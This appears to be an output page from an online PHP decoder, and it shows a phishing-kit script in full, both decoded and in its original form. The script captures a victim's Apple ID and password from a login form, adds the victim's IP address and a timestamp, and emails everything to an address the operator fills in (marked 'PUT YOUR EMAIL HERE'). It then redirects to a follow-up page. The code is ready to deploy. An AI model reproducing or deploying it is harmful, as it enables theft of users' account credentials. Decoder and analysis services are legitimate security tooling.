Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ini_set("output_buffering",4096); session_start(); $theAccountName = $_POST['..
Decoded Output download
<?php
ini_set("output_buffering",4096);
session_start();
$theAccountName = $_POST['theAccountName'];
$theAccountPW= $_POST['theAccountPW'];
$id = $_SESSION['id'] = $theAccountName;
$pwd = $_SESSION['pwd'] = $theAccountPW;
$date = gmdate ("d-n-Y");
$time = gmdate ("H:i:s");
$ip = $_SERVER['REMOTE_ADDR'];
$mailusers = '[email protected]'; /////////////// PUT YOUR EMAIL HERE \\\\\\\\
{
$data = "----------Apple_Result-----------
Apple ID : $theAccountName
Password : $theAccountPW
--------------Client IP Info----------------
Client IP : $ip
Date Log : $date
Time Log : $time
--------------------Result-------------------";
$subject = "|$ip|$date|$time|";
$headers = "From: ItunesID <APPLE LOGIN >";
$headers .= $_POST['[email protected]']."
";
$headers .= "MIME-Version: 1.0
";
mail($mailusers,$subject,$data,$headers);
header("Location: details.html");
}
?>
Did this file decode correctly?
Original Code
<?php
ini_set("output_buffering",4096);
session_start();
$theAccountName = $_POST['theAccountName'];
$theAccountPW= $_POST['theAccountPW'];
$id = $_SESSION['id'] = $theAccountName;
$pwd = $_SESSION['pwd'] = $theAccountPW;
$date = gmdate ("d-n-Y");
$time = gmdate ("H:i:s");
$ip = $_SERVER['REMOTE_ADDR'];
$mailusers = '[email protected]'; /////////////// PUT YOUR EMAIL HERE \\\\\\\\\\\\\\\\
{
$data = "----------Apple_Result-----------
Apple ID : $theAccountName
Password : $theAccountPW
--------------Client IP Info----------------
Client IP : $ip
Date Log : $date
Time Log : $time
--------------------Result-------------------";
$subject = "|$ip|$date|$time|";
$headers = "From: ItunesID <APPLE LOGIN >";
$headers .= $_POST['[email protected]']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($mailusers,$subject,$data,$headers);
header("Location: details.html");
}
?>
Function Calls
gmdate | 1 |
ini_set | 1 |
session_start | 1 |
Stats
MD5 | 4a55e32c3842fa8c86463834827e7b66 |
Eval Count | 0 |
Decode Time | 103 ms |